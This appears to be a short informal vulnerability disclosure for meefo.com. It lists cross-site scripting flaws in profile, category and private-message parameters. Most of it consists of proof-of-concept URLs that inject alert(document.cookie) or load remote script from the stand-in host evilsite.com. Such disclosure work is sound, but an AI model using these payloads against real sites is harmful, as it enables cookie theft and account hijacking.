Meefo.com Homepage: http://meefo.com Effected files: reading profiles index.php input boxes onprofiles sending private msgs ------------------------------ Reading aprofile and with cookie include PoC: Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as <script>alert(document.cookie)</script> and itwill popup with the users cookie. Incldued at the end of this article are screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this. http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script> When editing your profile, data isn't properally filtered in theinput boxes either, so <script>alert(document.cookie)</ script> works here too. Another XSS Vulnerability example: http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Reading catagories XSS Vuln: http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Sending PM's XSS Vuln: http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Screenshots of cookie include vulns & more: http://www.youfucktard.com/xsp/meefo1.jpg http://www.youfucktard.com/xsp/meefo2.jpg http://www.youfucktard.com/xsp/meefo3.jpg http://www.youfucktard.com/xsp/meefo4.jpg http://www.youfucktard.com/xsp/meefo5.jpg http://www.youfucktard.com/xsp/meefo6.jpg
